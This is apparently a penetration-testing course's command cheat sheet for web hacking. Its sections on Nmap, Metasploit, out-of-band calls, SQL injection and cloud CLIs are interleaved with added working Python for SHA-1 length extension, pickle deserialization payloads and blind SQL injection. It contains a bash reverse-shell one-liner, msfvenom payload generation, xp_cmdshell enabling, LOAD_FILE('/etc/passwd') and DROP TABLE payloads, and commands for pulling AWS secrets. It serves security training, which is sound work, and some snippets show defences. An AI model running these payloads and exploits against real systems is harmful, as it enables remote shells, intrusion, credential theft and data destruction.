Command Cheat Sheet

This document provides a cheat sheet of useful commands for web hacking and penetration testing. It includes common commands, additional tools, Nmap commands, Metasploit commands, encoding/decoding, out-of-band commands, and SQL injection payloads.


Advanced Web Hacking
Command Cheat Sheet
NSS Training – Command Cheat Sheet

Useful commands for Web Hacking Black Belt Edition
Note: All the required tools are installed in the path or in the directory /root/tools

Common Commands
$ burpsuite
    Start Burp from command line
$ sudo tcpdump -l -n udp port [port no] | grep 'subdomain.domain.com'
    Start a UDP packet listener and filter for a subdomain (port 53 to catch out-of-band DNS lookups; -l line-buffers tcpdump's output so grep sees each packet as it arrives)
$ sudo tcpdump -vvv -n port [port no]
    Start a packet listener
$ nc -lnvp <port>
    Netcat listener
$ bash -i >& /dev/tcp/<Listener_IP>/<PORT> 0>&1
    Bash one-line reverse shell
$ vim [filename]
    Load the file in vim editor; input 'i' to insert text, input [esc]:wq to save and quit vim
$ wget http[s]://website/url
    Download a file

Additional commands
./hash_extender --data [data] --secret-min [min-len] --secret-max [max-len] --append [value] --signature [signature] --format [type] --out-data-format [type] --table
    Hash length extension attack: from the known signature of secret||data, forge signatures for secret||data||padding||append for every secret length between min and max (--table prints one candidate per length); the secret itself is never needed
./xxeserv -w
    Start XXEServ over HTTP and FTP channel
java -jar [filename.jar]
    Execute the jar file
./phpggc -b slim/rce1 <function> <parameter>
    Creates a payload for PHP Slim framework to execute RCE (-b outputs it Base64 encoded)
git clone [git_url.git]
    Download the source from git

mvn clean package -DskipTests
    Compile code using maven and package it to jar file

© Claranet Cyber Security 2021. All rights reserved.
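The hash_extender entry above relies on how Merkle-Damgård hashes work: sha1(secret||data) is nothing more than the chaining state after the last padded block, so anyone who knows that digest and the length of the secret can keep hashing from it. The following added example (written for this page, not the course's hash_extender tool or any code from the sheet) does that for SHA-1 in pure Python, including the --secret-min/--secret-max style search for an unknown secret length; the secret, cookie data and appended value are constructed here for the offline check.

```python
# Added example: SHA-1 length extension against a MAC of the form sha1(secret || data).
import hashlib
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def sha1_padding(msg_len):
    """Bytes SHA-1 appends to a msg_len-byte message: 0x80, zeros up to 56 mod 64, then the bit length."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def sha1_compress(state, block):
    """One SHA-1 compression of a 64-byte block, starting from an arbitrary chaining state (h0..h4)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK32, a, _rotl(b, 30), c, d
    return tuple((s + v) & MASK32 for s, v in zip(state, (a, b, c, d, e)))


def length_extend(signature_hex, data, append, secret_len):
    """Given sha1(secret||data) and len(secret), forge sha1(secret||data||pad||append) without the secret.
    Returns (forged_message, forged_signature_hex); forged_message replaces data in the request."""
    state = struct.unpack(">5I", bytes.fromhex(signature_hex))   # digest == chaining state
    glue = sha1_padding(secret_len + len(data))                   # padding the server already absorbed
    forged = data + glue + append
    tail = append + sha1_padding(secret_len + len(forged))        # what the hash still has to absorb
    for off in range(0, len(tail), 64):
        state = sha1_compress(state, tail[off:off + 64])
    return forged, "".join(f"{w:08x}" for w in state)


def find_secret_len(verify, signature_hex, data, append, min_len, max_len):
    """Unknown secret length: try each candidate (hash_extender's --secret-min/--secret-max) until the
    target's verifier accepts one. Returns (secret_len, forged_message, forged_signature) or None."""
    for n in range(min_len, max_len + 1):
        forged, sig = length_extend(signature_hex, data, append, n)
        if verify(forged, sig):
            return n, forged, sig
    return None


# Constructed demo values (assumptions, not from the page): a server signing cookies as sha1(secret||data).
SECRET = b"s3cret-k3y!!"
DATA = b"user=guest&role=user"
APPEND = b"&role=admin"


def server_verify(message, signature_hex):
    """The victim's check; it holds the secret, the attacker only learns accept/reject."""
    return hashlib.sha1(SECRET + message).hexdigest() == signature_hex


def demo():
    legit_sig = hashlib.sha1(SECRET + DATA).hexdigest()   # the one signature the attacker observed
    hit = find_secret_len(server_verify, legit_sig, DATA, APPEND, 1, 64)
    if hit is None:
        return None
    n, forged, sig = hit
    return {"secret_len": n, "forged": forged, "accepted": server_verify(forged, sig),
            "last_param": forged.split(b"&")[-1]}


if __name__ == "__main__":
    print(demo())
```

The forged message carries the raw padding bytes (0x80, zeros, the 64-bit length), so when it goes into a URL parameter or cookie it must be percent-encoded (%80%00...); that is what hash_extender's --out-data-format option is for. A parser that reads the last occurrence of a duplicated key sees role=admin, which is the usual way this turns into privilege escalation.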

Python Commands
python pythonserv.py / pythonserv
    Runs the pythonserv script
python3 brute-jwt.py --file (Dictionary path) --algorithm (algorithm type) --token (token string)
    Runs the brute-jwt script along with its parameters
Python2: python -m SimpleHTTPServer [port no]
Python3: python3 -m http.server [port no]
    Starts a webserver on specified port number.
Python3: aws_enum.py --access-key (Key) --secret-key (Secret Key) --session-token (Token Value) --region (Region)
    Runs an AWS script and gives access details over a cloud instance.
Python3: coupon.py (MobileCarrier) (Discount)
    Runs discount coupon script
Python3: coupon_request_sig.py (coupon.txt) (id)
    Creates signatures for discount coupons
Python3: python_deser_oob.py <userdomain>
    Creates a python serialized payload for making an OOB call to a specified domain.
Python3: python_deser_shell.py
    Creates a python serialized payload for reverse shell.
python3 GeneratePayload.py [command] [dict_file]
    Create a python serialized payload in dictionary file.
python3 ExecutePaylaod.py <plex_server_url:port> [myPlexToken] [dict_file]
    Exploit the python serialization to execute the command generated using "GeneratePayload.py"
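The python_deser_oob.py, python_deser_shell.py, GeneratePayload.py and ExecutePaylaod.py entries all build on one mechanism: a pickle can name any importable callable together with its arguments, and pickle.loads() on the receiving side calls it. The added example below (written for this page, not the course scripts) builds an OOB DNS payload and a command payload that way, then shows the loader-side fix: a pickle.Unpickler subclass whose find_class refuses any global that is not on an allow-list. The domain string and the os.getcwd stand-in used for the offline check are constructed assumptions.

```python
# Added example: pickle payload generation (attacker side) and a restricted loader (defender side).
import io
import os
import pickle
import socket


class CallOnLoad:
    """Unpickling rebuilds an object by calling whatever __reduce__ returned, so returning
    (callable, args) makes pickle.loads() perform that call on the victim."""

    def __init__(self, func, args):
        self.func, self.args = func, args

    def __reduce__(self):
        return (self.func, self.args)


def oob_dns_payload(domain):
    """Payload that makes the victim resolve <domain>: watch the DNS listener for the hit."""
    return pickle.dumps(CallOnLoad(socket.gethostbyname, (domain,)))


def command_payload(command):
    """Payload that runs a shell command on the victim, e.g. the bash reverse-shell one-liner."""
    return pickle.dumps(CallOnLoad(os.system, (command,)))


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: every GLOBAL/STACK_GLOBAL opcode goes through find_class, so refusing
    anything outside an allow-list stops os.system, socket.gethostbyname, subprocess.* and friends."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    # Harmless stand-in for a command (assumption for the offline run): os.getcwd instead of a shell.
    benign = pickle.dumps(CallOnLoad(os.getcwd, ()))
    executed = pickle.loads(benign) == os.getcwd()       # the call happened inside loads()
    try:
        safe_loads(benign)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    plain = {"user": "guest", "ids": [1, 2]}             # ordinary data still round-trips
    return {"executed": executed, "blocked": blocked, "plain_data_ok": safe_loads(pickle.dumps(plain)) == plain}


if __name__ == "__main__":
    print(demo())
    open("oob.pkl", "wb").write(oob_dns_payload("userX.webhacklab.com"))
```

Built-in containers, strings and numbers are emitted as opcodes rather than globals, so they pass the restricted loader untouched; only references to importable names are checked. The allow-list is the whole policy: extend it per class the application legitimately deserialises, and treat any pickle that arrives from a client as untrusted regardless.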

NMAP
# nmap -sV -A -p- -nvvv [host]
    Full port range, no DNS resolution, default scripts with OS detection and traceroute (-A), version fingerprint, very verbose
# nmap -iL <infile> -oA <outfile> [host]
    Input and output files (-iL reads targets from a file; -oA writes normal, XML and grepable output under the given basename)
# nmap -p88 --script=<scriptname> --script-args arg1='value' [host]
    Nmap scripts with arguments

Metasploit
# msfconsole
    Launch Metasploit console
> use <module_name>
    Use an exploit / auxiliary
> set <parameter_name> <parameter_value>
    Set parameters
> set payload <payload_name>
    Set payload
> run/exploit
    Execute module
# msfconsole -x "use <module_name>; set <parameter_name> <parameter_value>; run; exit"
    Run a module without going into console
# msfvenom -p <payload_name> LHOST=<local_host_IP> LPORT=<local_port> -f <file_format> > filename.extension
    Generate a payload using msfvenom

ENCODE/DECODE Commands
$ echo -n "test" | base64
    Encode: text to Base64 (-n keeps echo's trailing newline out of the encoded data)
$ echo "<HEX>" | xxd -r -p
    Decode: hex to bytes
$ echo "<base64data>" | base64 -d
    Decode: Base64 to bytes
$ echo -n "<Bytes>" | xxd -p
    Encode: bytes to hex

Commonly Used Out Of Band (OOB) Commands
> ping <IP/Domain>
    ICMP request (a domain name also triggers a DNS request first)
> nslookup <Domain>
    DNS request
> nslookup <Domain> <Resolver_IP>
    DNS request via specific resolver
> nc/ncat <IP> <Port>
    Send a TCP/UDP request using Netcat/Ncat
> certutil -urlcache -split -f <URL>
    Send a HTTP/HTTPS request using certutil [Windows only]
> powershell Invoke-WebRequest -Uri <URL>
    Send a HTTP/HTTPS request using powershell [Windows only]

Commonly Used SQL Injection Payloads (MSSQL Server)
> 1' or '1'='1' --
    Authentication bypass
> ' waitfor delay '0:0:10' --
    Sleep for 10 seconds
> ' UNION SELECT NULL,TABLE_NAME,NULL FROM information_schema.TABLES--
    Extract table names
> ';exec master..xp_dirtree '\\userX.webhacklab.com\' --
    Execute an OOB call to the mentioned target (stacked query): the UNC path makes SQL Server resolve the hostname and attempt an SMB connection, visible on your DNS/SMB listener
> ';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; --
    Enable xp_cmdshell (stacked query; requires sysadmin or ALTER SETTINGS rights)
> ';exec master..xp_cmdshell '(Windows terminal command)' --
    Execute terminal command via xp_cmdshell (stacked query)

Commonly Used SQL Injection Payloads (MYSQL Server)
> 1' OR '1'='1' #
    Authentication bypass
> ' UNION ALL SELECT LOAD_FILE('/etc/passwd') #
    Read contents of a file (needs the FILE privilege and a path allowed by secure_file_priv)
> -@@version
> UNION ALL SELECT NULL,version() #
    MySQL server version details
> AND sleep(10) #
    Sleep for 10 seconds
> 2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
    Time based injection: the response is delayed only when the DB version starts with '5'; other values are extracted one character at a time the same way
> DROP TABLE sampletable;#
    Drops table from DB (dangerous)
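The authentication-bypass payloads in both the MSSQL and MySQL lists, and the MID(@@version,1,1) time-based one, share a single root cause: user input concatenated into the query text. The added example below (written for this page, not the lab's application or database) runs the bypass against a vulnerable login over an in-memory SQLite table constructed here, shows the parameterised version that defeats the same payload, and then uses the vulnerable query as a boolean oracle to pull sqlite_version() out one character at a time, the way the IF(MID(@@version,1,1)='5',sleep(1),1) payload does with a timing oracle (SQLite has no sleep(), so the oracle is "row returned or not"). The -- comment form is used because SQLite does not treat # as a comment.

```python
# Added example: auth-bypass payload against a string-built query, the bound-parameter fix,
# and blind character-by-character extraction through the same injection point.
import sqlite3

PAYLOAD = "1' or '1'='1' --"   # the authentication-bypass payload from the cheat sheet


def make_db():
    """Constructed sample data standing in for the lab's users table (assumption, not from the page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users(username, password) VALUES (?, ?)",
                    [("admin", "correct horse battery"), ("guest", "guest")])
    return con


def login_vulnerable(con, username, password):
    """Builds the query by string formatting. With PAYLOAD as username the WHERE clause becomes
    username = '1' or '1'='1' --' AND password = '...': the tautology matches every row and the
    comment swallows the password check, so the first user (admin) is returned."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Bound parameters: the payload is compared as a literal string and matches no user."""
    row = con.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row[0] if row else None


def extract_version(con, charset="0123456789.", max_len=32):
    """Boolean-based blind extraction through the vulnerable login: one injected substr()
    comparison per candidate character, true exactly when a row comes back."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"' OR substr(sqlite_version(),{pos},1)='{ch}' --"
            if login_vulnerable(con, probe, "") is not None:
                found += ch
                break
        else:
            return found            # no candidate matched: end of the string
    return found


def demo():
    con = make_db()
    return {
        "bypass_as": login_vulnerable(con, PAYLOAD, "wrong"),   # 'admin'
        "safe_result": login_safe(con, PAYLOAD, "wrong"),        # None
        "extracted": extract_version(con),
        "actual": sqlite3.sqlite_version,
    }


if __name__ == "__main__":
    print(demo())
```

Python's sqlite3 refuses to execute more than one statement per call, which is why the stacked-query payloads from the MSSQL list (xp_dirtree, xp_cmdshell) cannot be reproduced on this toy; the injection point is the same, only the driver's tolerance for stacking differs. Each extracted character costs one request per candidate here; a binary search over the character's ordinal (substr(...) > 'x') is the usual way to cut that down, and is what sqlmap does.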


Commonly used Cloud CLI Commands (AWS, AZURE)
> aws s3 ls
    List S3 buckets
> aws s3 cp <source> <destination> --recursive
    Recursively copy S3 buckets
> az storage share exists --account-name (account name) --account-key (account key) --name (name)
    Verifies whether a file share with that name exists in the storage account.
> az storage file download-batch --account-name (Account name) --account-key (Account Key) --destination (destination path) --source (source name) --no-progress
    Downloads the files from the storage share to a local path.
> aws cognito-idp sign-up --client-id (client id) --username (username) --password (password) --user-attributes Name="email",Value="(emailid)" Name="name",Value="(name)"
    Registers a user via cognito-idp with the mentioned details (works without credentials whenever the app client allows self sign-up).
> aws cognito-idp confirm-sign-up --client-id (clientid) --username=(username) --confirmation-code (code)
    Submits the confirmation code to activate the cognito-idp user.
> aws secretsmanager list-secrets
    Lists AWS Secrets Manager secrets
> aws cognito-identity get-id --identity-pool-id (identity pool id) --logins (IdentityPoolName)=(IdToken)
    Generates an authenticated Cognito identity (the --logins key is the identity provider name; for a user pool that is cognito-idp.(region).amazonaws.com/(user pool id))
> aws cognito-identity get-credentials-for-identity --identity-id (IdentityID) --logins (IdentityPoolName)=(Id Token)
    Creates temporary AWS credentials for the identity pool's authenticated role
> aws secretsmanager get-secret-value --secret-id (secretid)
    Fetches the details of the mentioned secret id via Secrets Manager

Commonly used Sqlmap Commands
sqlmap -r (Request file) --dbms (Database type) --second-order (URL of the page where the payload is reflected) --dbs
    Sqlmap command to test for second order SQL injection
sqlmap -r (Request file) --eval=(Eval script) --dbs --batch
    Sqlmap command to edit a value corresponding to a request at runtime (the eval script is Python code run before every request, e.g. to recompute a signature or CSRF parameter).
